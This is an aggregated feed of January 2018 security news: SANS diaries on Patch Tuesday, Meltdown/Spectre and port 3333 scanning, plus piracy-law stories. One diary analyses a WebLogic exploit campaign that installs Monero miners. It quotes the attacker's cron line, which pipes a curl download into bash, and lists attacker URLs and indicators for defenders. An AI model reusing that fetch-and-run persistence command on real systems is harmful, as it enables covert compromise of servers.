- Improve the testing of hunting use cases in an easier and more affordable way.
- Enable Data Science via Apache Spark, GraphFrames & Jupyter Notebooks
Second up, for your consideration, is the just released version 1.17 of ptf, the pentester's framework from Dave Kennedy's @TrustedSec.
The PenTesters Framework (PTF) is a Python script designed for Debian/Ubuntu/ArchLinux based distributions to create a similar and familiar distribution for Penetration Testing. As pentesters, we've been accustom to the /pentest/ directories or our own toolsets that we want to keep up-to-date all of the time. We have those "go to" tools that we use on a regular basis, and using the latest and greatest is important.
PTF attempts to install all of your penetration testing tools (latest and greatest), compile them, build them, and make it so that you can install/update your distribution on any machine. Everything is organized in a fashion that is cohesive to the Penetration Testing Execution Standard (PTES).
The 1.17 release includes:
- multiple fixes for aftercommands and escaping
- add Joomslav
- update masscan
- add Robot-Detect
Third on our list is VulnWhisper, also slotted for future toolsmith attention; it's already caught many an eye and cause some excitement, particularly in light of Spectre/Meltdown vulnerabilities. VulnWhisperer is a vulnerability data and report aggregator. Austin Taylor's VulnWhisperer will pull all the reports and create a file with a unique filename which is then fed into logstash. Logstash extracts data from the filename and tags all of the information inside the report (see logstash_vulnwhisp.conf file). Data is then shipped to elasticsearch to be indexed. VulnWhisperer includes support for:
- Nessus (v6 & v7)
- Qualys Web Applications
- Qualys Vulnerability Management (in progress)
- OpenVAS
- Nexpose
- Insight VM
- NMAP
- More to come
This is a great triple threat of GitHub offerings for your review and consideration, I know they're slated for me to do much more exploration.
Feel free to comment with some of your favorite GitHub information security projects.
Cheers.
(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
ISC Stormcast For Wednesday, January 10th 2018 https://isc.sans.edu/podcastdetail.html?id=5819, (Wed, Jan 10th) (c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
Microsoft January 2018 Patch Tuesday, (Tue, Jan 9th)
Microsoft, as expected included last weeks Meltdown/Spectre update in this months patch Tuesday. But note that in addition to these two flaws, we have a number of other "traditional" privilege escalation and even remote code execution flaws that are probably easier to exploit and should be treated probably with a higher priority. Regardless, I doubt that as many people will work overtime for these run of the mill flaws. For example:
CVE-2018-0788: A quick NVD search shows 15 different vulnerabilities for this Atmfd.dll. Some can even lead to code execution. But I doubt you will have this issue patched this week. Exploitation of CVE-2018-0788 can lead to code execution as administrator. Spectre/Meltdown only allow reading data.
CVE-2018-0773: An attacker may execute arbitrary code in the context of the user running the browser. Spectre, which was patched in many browser again only allows reading data.
and CVE-2018-0802, which is already being exploited.
So better get patching. It worked so well last month :)
January 2018 Security Updates
| Description | |||||
|---|---|---|---|---|---|
| CVE | Disclosed | Exploited | Exploitability (old versions) | current version | Severity |
| .NET Security Feature Bypass Vulnerability | |||||
| %%cve:2018-0786%% | No | No | Less Likely | Less Likely | Important |
| .NET and .NET Core Denial Of Service Vulnerability | |||||
| %%cve:2018-0764%% | No | No | Unlikely | Unlikely | Important |
| ASP.NET Core Cross Site Request Forgery Vulnerabilty | |||||
| %%cve:2018-0785%% | No | No | Unlikely | Unlikely | Moderate |
| ASP.NET Core Elevation Of Privilege Vulnerability | |||||
| %%cve:2018-0784%% | No | No | Less Likely | Less Likely | Important |
| Guidance to mitigate speculative execution side-channel vulnerabilities | |||||
| ADV180002 | No | No | Less Likely | Less Likely | Important |
| January 2018 Adobe Flash Security Update | |||||
| ADV180001 | No | No | - | - | Critical |
| Microsoft Access Tampering Vulnerability | |||||
| %%cve:2018-0799%% | No | No | Unlikely | Unlikely | Important |
| Microsoft Color Management Information Disclosure Vulnerability | |||||
| %%cve:2018-0741%% | No | No | - | - | Important |
| Microsoft Edge Elevation of Privilege Vulnerability | |||||
| %%cve:2018-0803%% | No | No | - | - | Important |
| Microsoft Edge Information Disclosure Vulnerability | |||||
| %%cve:2018-0766%% | No | No | Unlikely | Unlikely | Important |
| Microsoft Excel Remote Code Execution Vulnerability | |||||
| %%cve:2018-0796%% | No | No | Less Likely | Less Likely | Important |
| Microsoft Office Defense in Depth Update | |||||
| ADV180003 | No | No | - | - | None |
| Microsoft Office Memory Corruption Vulnerability | |||||
| %%cve:2018-0802%% | No | Yes | Unlikely | Unlikely | Important |
| %%cve:2018-0798%% | No | No | Less Likely | Less Likely | Important |
| Microsoft Office Remote Code Execution Vulnerability | |||||
| %%cve:2018-0795%% | No | No | - | - | Important |
| Microsoft Office Remote Code Execution Vulnerability | |||||
| %%cve:2018-0801%% | No | No | Less Likely | Less Likely | Important |
| Microsoft Outlook Remote Code Execution Vulnerability | |||||
| %%cve:2018-0791%% | No | No | Less Likely | Less Likely | Important |
| %%cve:2018-0793%% | No | No | More Likely | More Likely | Important |
| Microsoft SharePoint Cross Site Scripting Elevation of Privilege Vulnerability | |||||
| %%cve:2018-0790%% | No | No | Less Likely | Less Likely | Important |
| Microsoft SharePoint Elevation of Privilege Vulnerability | |||||
| %%cve:2018-0789%% | No | No | Less Likely | Less Likely | Important |
| Microsoft Word Memory Corruption Vulnerability | |||||
| %%cve:2018-0812%% | No | No | Unlikely | Unlikely | Important |
| %%cve:2018-0797%% | No | No | Less Likely | Less Likely | Critical |
| Microsoft Word Remote Code Execution Vulnerability | |||||
| %%cve:2018-0805%% | No | No | Unlikely | Unlikely | Important |
| %%cve:2018-0806%% | No | No | Unlikely | Unlikely | Important |
| %%cve:2018-0807%% | No | No | Unlikely | Unlikely | Important |
| Microsoft Word Remote Code Execution Vulnerability | |||||
| %%cve:2018-0804%% | No | No | Unlikely | Unlikely | Low |
| %%cve:2018-0792%% | No | No | Less Likely | Less Likely | Important |
| %%cve:2018-0794%% | No | No | More Likely | More Likely | Important |
| OpenType Font Driver Elevation of Privilege Vulnerability | |||||
| %%cve:2018-0788%% | No | No | More Likely | More Likely | Important |
| OpenType Font Driver Information Disclosure Vulnerability | |||||
| %%cve:2018-0754%% | No | No | More Likely | More Likely | Important |
| SMB Server Elevation of Privilege Vulnerability | |||||
| %%cve:2018-0749%% | No | No | Less Likely | Less Likely | Important |
| Scripting Engine Information Disclosure Vulnerability | |||||
| %%cve:2018-0800%% | No | No | Less Likely | Less Likely | Critical |
| %%cve:2018-0767%% | No | No | Unlikely | Unlikely | Critical |
| %%cve:2018-0780%% | No | No | - | - | Critical |
| Scripting Engine Memory Corruption Vulnerability | |||||
| %%cve:2018-0773%% | No | No | - | - | Critical |
| %%cve:2018-0774%% | No | No | - | - | Critical |
| %%cve:2018-0781%% | No | No | Unlikely | Unlikely | Critical |
| %%cve:2018-0758%% | No | No | - | - | Critical |
| %%cve:2018-0762%% | No | No | More Likely | More Likely | Critical |
| %%cve:2018-0768%% | No | No | Less Likely | Less Likely | Important |
| %%cve:2018-0769%% | No | No | - | - | Critical |
| %%cve:2018-0770%% | No | No | - | - | Critical |
| %%cve:2018-0772%% | No | No | - | - | Critical |
| %%cve:2018-0775%% | No | No | - | - | Critical |
| %%cve:2018-0776%% | No | No | - | - | Critical |
| %%cve:2018-0777%% | No | No | - | - | Critical |
| %%cve:2018-0778%% | No | No | Unlikely | Unlikely | Critical |
| Scripting Engine Security Feature Bypass | |||||
| %%cve:2018-0818%% | No | No | Unlikely | Unlikely | Important |
| Spoofing Vulnerability in Microsoft Office for MAC | |||||
| %%cve:2018-0819%% | Yes | No | Less Likely | Less Likely | Important |
| Windows Elevation of Privilege Vulnerability | |||||
| %%cve:2018-0748%% | No | No | Less Likely | Less Likely | Important |
| %%cve:2018-0751%% | No | No | Less Likely | Less Likely | Important |
| %%cve:2018-0752%% | No | No | Less Likely | Less Likely | Important |
| %%cve:2018-0744%% | No | No | More Likely | More Likely | Important |
| Windows GDI Information Disclosure Vulnerability | |||||
| %%cve:2018-0750%% | No | No | More Likely | More Likely | Important |
| Windows IPSec Denial of Service Vulnerability | |||||
| %%cve:2018-0753%% | No | No | - | - | Important |
| Windows Information Disclosure Vulnerability | |||||
| %%cve:2018-0746%% | No | No | More Likely | More Likely | Important |
| %%cve:2018-0747%% | No | No | More Likely | More Likely | Important |
| %%cve:2018-0745%% | No | No | More Likely | More Likely | Important |
| Windows Subsystem for Linux Elevation of Privilege Vulnerability | |||||
| %%cve:2018-0743%% | No | No | Less Likely | Less Likely | Important |
---
Johannes B. Ullrich, Ph.D. , Dean of Research, SANS Technology Institute
STI|Twitter|
What is going on with port 3333?, (Tue, Jan 9th)
We've seen a spike over the last day or so in reports of apparent scanning on TCP %%port:3333%%. I have serious doubts that anyone is actually looking for DEC Notes which is the registered IANA use for this port. While we're getting our own honeypots set up, I figured I'd ask our readers, do you have packets and/or any idea what is going on here? Please let us know in the comments or via our contact page. Thanx in advance.
Update: 2018-01-09 03:00 The original version of this diary inadvertantly said the traffic was UDP, the traffic that I am seeing in my logs at home is actually TCP. My apologies for the confusion.
Update: 2018-01-10 00:00 UTC The recurring theme in comments and email we've received suggests that some of the recent Monero miner malware samples are sending their results back to C2 servers on port 3333, so perhaps folks are trying to find and steal the illgotten cryptocurrency. I still haven't examined any traffic captured by our honeypots to confirm or refute that that is what they are looking for.
---------------
Jim Clausing, GIAC GSE #26
jclausing --at-- isc [dot] sans (dot) edu
Upcoming Courses Taught By Jim Clausing
| Type | Course / Location | Date |
|---|---|---|
 Community SANS |
Community SANS Minneapolis FOR610 Minneapolis, MN
|
Mar 5, 2018 - Mar 10, 2018 |
Community SANS |
Community SANS Columbia FOR610 Columbia, MD
|
Mar 26, 2018 - Mar 31, 2018 |
January 09, 2018
Comic for January 09, 2018 Dilbert readers - Please visit Dilbert.com to read this feature. Due to changes with our feeds, we are now making this RSS feed a link to Dilbert.com.
[$] A look at the handling of Meltdown and Spectre
The Meltdown/Spectre debacle has, deservedly, reached the mainstream press and, likely, most of the public that has even a remote interest in computers and security. It only took a day or so from the accelerated disclosure date of January 3—it was originally scheduled for January 9—before the bugs were making big headlines. But Spectre has been known for at least six months and Meltdown for nearly as long—at least to some in the industry. Others that were affected were completely blindsided by the announcements and have joined the scramble to mitigate these hardware bugs before they bite users. Whatever else can be said about Meltdown and Spectre, the handling (or, in truth, mishandling) of this whole incident has been a horrific failure.
Tails 3.4 is out The privacy focused Tails distribution has released version 3.4. This released updates the kernel to 4.14.12 to include the latest Meltdown and Spectre patches. Many other security issues have been fixed in this release, and users should upgrade.
[$] A new kernel polling interface Polling a set of file descriptors to see which ones can perform I/O without blocking is a useful thing to do — so useful that the kernel provides three different system calls (select(), poll(), and epoll_wait() — plus some variants) to perform it. But sometimes three is not enough; there is now a proposal circulating for a fourth kernel polling interface. As is usually the case, the motivation for this change is performance.
Daniel Miessler on My Writings about IoT Security
Daniel Miessler criticizes my writings about IoT security:
I know it's super cool to scream about how IoT is insecure, how it's dumb to hook up everyday objects like houses and cars and locks to the internet, how bad things can get, and I know it's fun to be invited to talk about how everything is doom and gloom.
I absolutely respect Bruce Schneier a lot for what he's contributed to InfoSec, which makes me that much more disappointed with this kind of position from him.
InfoSec is full of those people, and it's beneath people like Bruce to add their voices to theirs. Everyone paying attention already knows it's going to be a soup sandwich -- a carnival of horrors -- a tragedy of mistakes and abuses of trust.
It's obvious. Not interesting. Not novel. Obvious. But obvious or not, all these things are still going to happen.
I actually agree with everything in his essay. "We should obviously try to minimize the risks, but we don't do that by trying to shout down the entire enterprise." Yes, definitely.
I don't think the IoT must be stopped. I do think that the risks are considerable, and will increase as these systems become more pervasive and susceptible to class breaks. And I'm trying to write a book that will help navigate this. I don't think I'm the prophet of doom, and don't want to come across that way. I'll give the manuscript another read with that in mind.
A Story About PeopleSoft: How to Make $250k Without Leaving Home., (Mon, Jan 8th)
Yesterday, Renato published a diary about an intrusion taking advantage of a recent flaw in WebLogic. Oracle’s WebLogic is a Java EE application server [1]. PeopleSoft, another popular Oracle product can use WebLogic as a web server. PeopleSoft itself is a complex enterprise process management system. The name implies human resource functions, but the software goes way beyond simple HR features. Typically, “everything” in an organization lives in PeopleSoft [2].
As you can probably imagine, a compromise of a PeopleSoft system is pretty much a worst-case compromise for an organization.
When Renato got involved in the incident he described on Monday; he was surprised that the “only” thing he found was a crypto coin miner. An attacker would probably have been able to do a lot more damage to an organization by exfiltrating the data that lives on the system, or worse, modify it.
The Vulnerability
The vulnerability exploited, CVE-2017-10271 has a CVSS score of 9.8 (Critical) and is easily exploitable. In October 2017 Oracle released a patch as part of its quarterly Critical Patch Update.
End of December, Lian Zhang, a Chinese security researcher, released an exploit script to take advantage of the exploit. Lian's post may not be the first, but this looks like the exploit that was used in the attack discussed here, and the post appears to have started an increased interest in this flaw. Lian’s blog is talking about CVE 2017-3506, but the exploit matches CVE-2017-10271. Oracle’s April CPU patched CVE 2017-3506, but it didn’t do so completely, leaving an opening that let to CVE-2017-10271.
Either way, you could probably call it either vulnerability. The cause is as so often insecure deserialization. Oracle’s fix was to add a validate method that checks an object is passed, and if it is, then it will throw an exception. Probably the best blog I found about these two vulnerabilities and how they relate is the one by [5].
What Happened Next
Starting at the end of December first reports were published about this exploit being used to install crypto miners. We did see a couple of different URLs being used to install the miner:
hxxp://165.227.215. 25 – the base URL reported by Renato yesterday. No longer reachable
hxxp://www.viewyng. com/includes/libraries – base URL for another victim. Still reachable as of today (1/9/2018).
Hxxp://letoscribe. ru/includes – base URL observed by another victim. Still reachable as of today (1/9/2018)
The exploit will download a simple bash file that will:
- Find a working directory (/tmp, /var/tmp or ${PWD}, the current directory)
- Kill any existing miners on the system
- Create a CRON job to download the miner:
3 2,5,8,11,14,17,30 * * * curl –s \”$setupurl\” | bash” > “${cronfile}” - Create a subdirectory “.X1MUnix”
- Download the miner (either called xmrig or fs-manager)
The Miner
The miner, xmrig, is not exactly malware. It is a legit crypto coin miner for Monero. The miner comes with a configuration file showing us where the money will go that is mined using this application. Renato was able to recover one such configuration file, and the pool the miner was connecting to does show that up to this point, 611 Monero coins were mined by this user, which amounts to about $226,070 currently. The hash rate of this user of 450 KH/s would only support $31k per month so that this user may be at it for a while, or some systems were already cleaned up and are no longer participating in the effort.
.png)
Renato also recovered files from another campaign using the same vulnerability. This group opted for mining AEON instead of Monero. Even though they are achieving a similar hash rate, they only earned about $ 6k so far. Maybe they will switch to Monero after reading this.
The Victims
The exploited vulnerability affects WebLogic, but we did see some PeopleSoft servers exploited. PeopleSoft, being a very complex application, is difficult to patch and maintain. The exploit bash script will “register” new victims with the attacker’s server, and we managed to get a hold of one of the logs left behind by the attacker. The log started on January 4th and 8 am ET. It is still seeing new connections right now (January 9th 8 am ET). The last log I retrieved includes 722 IP addresses.
Based on a quick reverse DNS lookup and an ASN lookup, I found a high concentration of affected IPs at cloud providers. This isn’t a surprise since many organizations are moving their most critical data to the cloud to make it easier for the bad guys to get to it. Also, not a big surprise is the relatively high percentage of IPs in Oracle’s cloud. The exploit does attack a key Oracle component.
The victims are distributed worldwide. This isn’t a targeted attack. Once the exploit was published, anybody with limited scripting skills was able to participate in taking down WebLogic (/PeopleSoft) servers.
(image credit: Renato Marinho)
If You Are a Victim
Please DO NOT stop your incident response by removing the miner. Your server was vulnerable to an easily executed remote code execution exploit. It is very likely that more sophisticated attackers used this to gain a persistent foothold on the system. In this case, the only “persistence” we noticed was the CRON job. But there are many more, and more difficult to detect, ways to gain persistence.
Indicators of Compromise:
- High CPU Utilization
- Outbound connections to a mining pool (we observed in particular connections to hashvault.pro and these IPs: 145.239.0.84, 104.207.141.144 and 45.76.198.204. (note that some mining pools are behind proxy services like Cloudflare and these may be shared IPs. Same is true for our "Miner IP" feed [6])
- Hashes:
7153ac617df7aa6f911e361b1f0c8188ca5c142c6aaa8faa2a59b55e0b823c1c fs-manager
d7d6ed5b968858699c2f6aee6a0024a4c9574f1c2153f46940476e15194f848e xmrig-y
Acknowledgements
Thanks to our readers who helped us out with this by sharing details about this intrusion. Also thanks to Renato who wrote this up initially and provided much of the data used here. Thanks to Team Cyrmu’s IP to ASN conversion tools.
[1] http://www.oracle.com/technetwork/middleware/weblogic/overview/index.html
[2] http://www.oracle.com/us/products/applications/peoplesoft-enterprise/overview/index.html
[3] https://nvd.nist.gov/vuln/detail/CVE-2017-10271
[4] http://www.oracle.com/technetwork/security-advisory/cpuoct2017-3236626.html
[5] https://www.anquanke.com/post/id/92003
[6] https://isc.sans.edu/api/threatlist/miner
---
Johannes B. Ullrich, Ph.D., Dean of Research, SANS Technology Institute
STI|Twitter|
Media Giant Can Keep Seized Ad Revenue From Pirate Sites
For several decades the MPAA and RIAA have been the prime anti-piracy groups in the United States.
While that may be true, there’s another player making a massive impact, while getting barely any press.
ABS-CBN, the largest media and entertainment company in the Philippines, has filed a series of lawsuits against pirate sites in the US, with the popular streaming portal Fmovies as the biggest target.
The company has already won several cases with damages ranging from a few hundred thousand to millions of dollars. However, the associated injunctions in these cases are perhaps even more significant.
We previously covered how ABS-CBN managed to get court orders to seize domain names, without the defendants getting actively involved. This is also the case in a recent lawsuit where a Florida federal court signed a broad injunction targeting more than two dozen sites that offered the company’s content.
The websites, including abscbn-teleserye.com, dramascools.com, tvnijuan.org, pinoydailyshows.com and weeklywarning.org, may not be known to a broad audience but their domain names have all been suspended, linking to a takedown message instead.
What’s most interesting, however, is that the advertising revenues of these sites were previously frozen. This was done to ensure that ABS-CBN would at least get some money if the defendants failed to respond, a strategy that seems to have paid off.
After the targeted site owners failed to respond, ABS-CBN requested a default judgment with damages for trademark and copyright infringement.
U.S. District Court Judge Cecilia Altonaga has now signed the order, awarding the media company over a million dollars in statutory trademark infringement damages. In addition, several of the sites must also pay copyright infringement damages.
The default judgment also orders associated registrars and registries to hand over the domain names to ABS-CBN. Thus far several domains have been seized already, but some foreign companies have not complied, most likely because they fall outside the US jurisdiction.
The most interesting part of the order, however, is that Judge Altonaga grants ABS-CBN the previously seized advertising revenues.
“All funds currently restrained by the advertising services, networks, and/or platforms […], pursuant to the temporary restraining order and preliminary injunction in this action are to be immediately (within five business days) transferred to Plaintiffs in partial satisfaction of the monetary judgment entered herein against each Defendant,” the Judge writes.
The sites in question used advertising services from a variety of well-known networks, including Google Adsense, MGID, Popads, AdsKeeper, and Bidvertiser. None of these companies responded in court after the initial seizure order, suggesting that they did not object.
This is the first time, to our knowledge, that a copyright holder has been granted advertising revenue from pirate sites in this manner. While it’s not known how much revenue the sites were making, there is bound to be some.
This could be a common legal tactic going forward because, generally speaking, it is very hard to get money from defaulting defendants who are relatively anonymous, or living in a foreign jurisdiction. By going after the advertisers, copyright holders have a good chance of securing some money, at least.
—
A copy of the default judgment is available here (pdf) and all affected websites are listed below.
– abscbn-teleserye.com
– astigvideos.com
– cinepinoy.lol
– cinepinoy.ag
– pinoyflix.ag
– pinoyflix.lol
– cinezen.me
– dramascools.com
– dramasget.com
– frugalpinoytv.org
– lambingan.cn
– pinoylambingan.ph
– lambingan.io
– lambingans.net
– latestpinoymovies.com
– pinasnews.net
– pinastvreplay.com
– pinoybay.ch
– pinoychannel.me
– pinoydailyshows.com
– pinoyplayback.net
– pinoytvshows.net
– pinoytv-shows.net
– rondownload.net
– sarapmanood.com
– tambayanshow.net
– thelambingan.com
– tvnijuan.org
– tvtambayan.org
– vianowpe.com
– weeklywarning.org
– weeklywarning.com
Source: TF, for the latest info on copyright, file-sharing, torrent sites and more. We also have VPN discounts, offers and coupons
Security updates for Tuesday Security updates have been issued by Arch Linux (graphicsmagick and linux-lts), CentOS (thunderbird), Debian (kernel, opencv, php5, and php7.0), Fedora (electrum), Gentoo (libXfont), openSUSE (gimp, java-1_7_0-openjdk, and libvorbis), Oracle (thunderbird), Slackware (irssi), SUSE (kernel, kernel-firmware, and kvm), and Ubuntu (awstats, nvidia-graphics-drivers-384, python-pysaml2, and tomcat7, tomcat8).
[$] Is it time for open processors? The disclosure of the Meltdown and Spectre vulnerabilities has brought a new level of attention to the security bugs that can lurk at the hardware level. Massive amounts of work have gone into improving the (still poor) security of our software, but all of that is in vain if the hardware gives away the game. The CPUs that we run in our systems are highly proprietary and have been shown to contain unpleasant surprises (the Intel management engine, for example). It is thus natural to wonder whether it is time to make a move to open-source hardware, much like we have done with our software. Such a move may well be possible, and it would certainly offer some benefits, but it would be no panacea.
NSA Morale
The Washington Post is reporting that poor morale at the NSA is causing a significant talent shortage. A November New York Times article said much the same thing.
The articles point to many factors: the recent reorganization, low pay, and the various leaks. I have been saying for a while that the Shadow Brokers leaks have been much more damaging to the NSA -- both to morale and operating capabilities -- than Edward Snowden. I think it'll take most of a decade for them to recover.
Tech Companies Meet EC to Discuss Removal of Pirate & Illegal Content
Thousands perhaps millions of pieces of illegal content flood onto the Internet every single day, a problem that’s only increasing with each passing year.
In the early days of the Internet very little was done to combat the problem but with the rise of social media and millions of citizens using it to publish whatever they like – not least terrorist propaganda and racist speech – governments around the world are beginning to take notice.
Of course, running parallel is the multi-billion dollar issue of intellectual property infringement. Eighteen years on from the first wave of mass online piracy and the majority of popular movies, TV shows, games, software and books are still available to download.
Over the past couple of years and increasingly in recent months, there have been clear signs that the EU in particular wishes to collectively mitigate the spread of all illegal content – from ISIS videos to pirated Hollywood movies – with assistance from major tech companies.
Google, YouTube, Facebook and Twitter are all expected to do their part, with the looming stick of legislation behind the collaborative carrots, should they fail to come up with a solution.
To that end, five EU Commissioners – Dimitris Avramopoulos, Elżbieta Bieńkowska, Věra Jourová, Julian King and Mariya Gabriel – will meet today in Brussels with representatives of several online platforms to discuss progress made in dealing with the spread of the aforementioned material.
In a joint statement together with EC Vice-President Andrus Ansip, the Commissioners describe all illegal content as a threat to security, safety, and fundamental rights, demanding a “collective response – from all actors, including the internet industry.”
They note that online platforms have committed significant resources towards removing violent and extremist content, including via automated removal, but more needs to be done to tackle the issue.
“This is starting to achieve results. However, even if tens of thousands of pieces of illegal content have been taken down, there are still hundreds of thousands more out there,” the Commissioners writes.
“And removal needs to be speedy: the longer illegal material stays online, the greater its reach, the more it can spread and grow. Building on the current voluntary approach, more efforts and progress have to be made.”
The Commission says it is relying on online platforms such as Google and Facebook to “step up and speed up their efforts to tackle these threats quickly and comprehensively.” This should include closer cooperation with law enforcement, sharing of information with other online players, plus action to ensure that once taken down, illegal content does not simply reappear.
While it’s clear that that the EC would prefer to work collaboratively with the platforms to find a solution to the illegal content problem, as expected there’s the veiled threat of them being compelled by law to do so, should they fall short of their responsibilities.
“We will continue to promote cooperation with social media companies to detect and remove terrorist and other illegal content online, and if necessary, propose legislation to complement the existing regulatory framework,” the EC warns.
Today’s discussions run both in parallel and in tandem with others specifically targeted at intellectual property abuses. Late November the EC presented a set of new measures to ensure that copyright holders are well protected both online and in the physical realm.
A key aim is to focus on large-scale facilitators, such as pirate site operators, while cutting their revenue streams.
“The Commission seeks to deprive commercial-scale IP infringers of the revenue flows that make their criminal activity lucrative – this is the so-called ‘follow the money’ approach which focuses on the ‘big fish’ rather than individuals,” the Commission explained.
This presentation followed on the heels of a proposal last September which had the EC advocating the take-down-stay-down principle, with pirate content being taken down, automated filters ensuring infringement can be tackled proactively, with measures being taken against repeat infringers.
Again, the EC warned that should cooperation with Internet platforms fail to come up with results, future legislation cannot be ruled out.
Source: TF, for the latest info on copyright, file-sharing, torrent sites and more. We also have VPN discounts, offers and coupons
Own on install. How grave it is?
This is well known, haven't seen it discussed. In short doing clean install (factory defaults) has a window of opportunity when the device is vulnerable to a known network attack. It used to be common sense to reinstall after compromise (probably doesn't apply to the windows world where the antivirus takes care). All versions of windoze are affected by the SMB bug to my knowledge. Debian jessie (old stable) is vulnerable to malicious mirror attack. More of interest to me are devices where the installation media is fixed and can't be changed. This includes smartphones and wireless routers. Some smartphones might be vulnerable to wifi RCE (found by google?). Some wireless routers might be vulnerable to wifi RCE or default admin password attack over wifi. Internet of Things will make things worse (some NAS devices are affected). Shielding the device might not be solution since updates must be applied. Are the above concerns real? Have this been studied systematically?
01/08/18 PHD comic: 'Number of Side Projects'
| Piled Higher & Deeper by Jorge Cham |
www.phdcomics.com
|
|
 |
||
|
title:
"Number of Side Projects" - originally published
1/8/2018
For the latest news in PHD Comics, CLICK HERE! |
||
ISC Stormcast For Tuesday, January 9th 2018 https://isc.sans.edu/podcastdetail.html?id=5817, (Tue, Jan 9th) (c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
January 08, 2018
Comic for January 08, 2018 Dilbert readers - Please visit Dilbert.com to read this feature. Due to changes with our feeds, we are now making this RSS feed a link to Dilbert.com.
TVAddons and ZemTV Ask Court to Dismiss U.S. Piracy Lawsuit
Last year, American satellite and broadcast provider Dish Network targeted two well-known players in the third-party Kodi add-on ecosystem.
In a complaint filed in a federal court in Texas, add-on ZemTV and the TVAddons library were accused of copyright infringement. As a result, both are facing up to $150,000 in damages for each offense.
While the case was filed in Texas, neither of the defendants live there, or even in the United States. The owner and operator of TVAddons is Adam Lackman, who resides in Montreal, Canada. ZemTV’s developer Shahjahan Durrani is even further away in London, UK.
Their limited connection to Texas is reason for the case to be dismissed, according to the legal team of the two defendants. They are represented by attorneys Erin Russel and Jason Sweet, who asked the Court to drop the case late last week.
According to their motion, the Texas District Court does not have jurisdiction over the two defendants.
“Lackman and Durrani have never been residents or citizens of Texas; they have never owned property in Texas; they have never voted in Texas; they have never personally visited Texas; they have never directed any business activity of any kind to anyone in Texas […] and they have never earned income in Texas,” the motion reads.
Technically, defendants can be sued in a district they have never been, as long as they “directed actions” at the state or its citizens.
According to Dish, this is the case here since both defendants made their services available to local residents, among other things. However, the defense team argues that’s not enough to establish jurisdiction in this case.
“Plaintiff’s conclusory allegation that Lackman and Durrani marketed, made available, and distributed ZemTV service and the ZemTV add-on to consumers in the State of Texas and the Southern District of Texas is misleading at best,” the attorneys write.
If the case proceeds this would go against the US constitution, violating the defendants’ due process rights. Whether the infringement claims hold ground or not, Dish has no right to sue, according to the defense.
“Defendants are citizens of Canada and Great Britain and have not had sufficient contacts in the State of Texas for this Court to exercise personal jurisdiction over them. To do so would violate the Due Process Clause of the United States Constitution.”
The Court must now decide whether the case can proceed or not. TorrentFreak reached out to TVAddons but the service wishes to refrain from commenting on the proceeding at the moment.
Previously, TVAddons made it clear that it sees the Dish lawsuit as an attempt to destroy the Kodi addon community. One of the methods of attack it mentioned, was to sue people in foreign jurisdictions.
“Most people don’t have money lying around to hire lawyers in places they’ve never even visited. This means that if a company sues you in a foreign country and you can’t afford a lawyer, you’re screwed even if you did nothing wrong,” TVAddons wrote at the time.
—
A copy of the motion to dismiss is available here (pdf).
Source: TF, for the latest info on copyright, file-sharing, torrent sites and more. We also have VPN discounts, offers and coupons
MusE 3.0.0 released Three years after the last stable release, version 3.0 of the MusE MIDI/Audio sequencer is now available. As you might expect there many changes since the last release including a switch to Qt5, a new Plugin Path editor in Global Settings, a mixer makeover with lots of fixes, a system-wide move to double precision of all audio paths, and much more.
Security updates for Monday Security updates have been issued by Arch Linux (linux-hardened, linux-lts, linux-zen, and mongodb), Debian (gdk-pixbuf, gifsicle, graphicsmagick, kernel, and poppler), Fedora (dracut, electron-cash, and firefox), Gentoo (backintime, binutils, chromium, emacs, libXcursor, miniupnpc, openssh, optipng, and webkit-gtk), Mageia (kernel, kernel-linus, kernel-tmb, openafs, and python-mistune), openSUSE (clamav-database, ImageMagick, kernel-firmware, nodejs4, and qemu), Red Hat (linux-firmware, ovirt-guest-agent-docker, qemu-kvm-rhev, redhat-virtualization-host, rhev-hypervisor7, rhvm-appliance, thunderbird, and vdsm), Scientific Linux (thunderbird), SUSE (kernel and qemu), and Ubuntu (firefox and poppler).
Meltdown and Spectre: clearing up the confusion, (Mon, Jan 8th)
Unless you’ve been living under a rock (or on a remote island, with no Internet connection), you’ve heard about the latest vulnerabilities that impact modern processors.
I’m sure that most of our readers are scrambling in order to assess the risk, patch systems and what not, so we have decided to write a diary that will clear the confusion a bit and point out some important things that people might not be aware of.
What is this all about?
First, if you haven’t already listened to SANS’ webcast about Meltdown and Spectre by Jake Williams, I strongly suggest that you go and do that – the recording is available at https://www.youtube.com/watch?v=8FFSQwrLsfE
Jake explains everything pretty well (although I think with some minor errors about Spectre that I will try to clear below).
In a nut shell, what do these two vulnerabilities allow an attacker to do?
While I won’t go into technical details here (which are pretty complex – this was in my opinion amazing research, although the Google’s blog could have been a bit easier to read :)), here is what it boils down to:
- Meltdown allows a local, userland (unprivileged) process to read contents of any memory mapped to the process. This includes kernel memory and this is why this vulnerability is dangerous.
- Spectre allows a local, userland (unprivileged) process to read contents of memory of other processes (this is where maybe Jake’s presentation wasn’t so clear about). Update 2:
Spectre does not allow reading of kernel memory.It looks as Spectre can indeed be used to read kernel memory. Additionally, while it's maybe not 100% clear, from Google's blog post (https://googleprojectzero.blogspot.hr/2018/01/reading-privileged-memory-with-side.html) it definitely appears that this is cross-process.
There is a Spectre PoC out, however in the PoC a single process is used: a secret is set in memory as a character array and then its contents are read by exploiting the vulnerability. This made people think that it’s intra-process only (single process), but it is actually cross process memory ready (see the Spectre paper page 2, Attacks using Native Code, available at Spectre Paper).
Ok, now that we know what the vulnerabilities are about we can assess the risk: as you can see, in both cases, an attacker actually needs to run some code on the target machine to exploit these vulnerabilities.
This makes vulnerabilities highest risk for the following:
- Anything that runs untrusted code on your machine (a browser typically),
- Anything running in virtualization or clouds.
So, for a typical company, on your Domain Controller (for example), the risk is actually very, very low: since you are not running untrusted code there (hopefully), an attacker should not be able to exploit these vulnerabilities in the first place.
For a typical user, the browser presents the highest risk, but we have yet to see proof of concept code that exploits this vulnerability through JavaScript – and browser vendors have started issuing patches as well (for example, Mozilla has issued a new version of Firefox, 57.0.4, where they have decreased the precision of time sources to make attacks such as Spectre more difficult or impossible). If you run stuff as Administrator: Spectre makes no difference for you really.
In other words: the world will not end over the weekend.
What to do now?
Keep an eye on the development and patches released by vendors, but not differently than other patches.
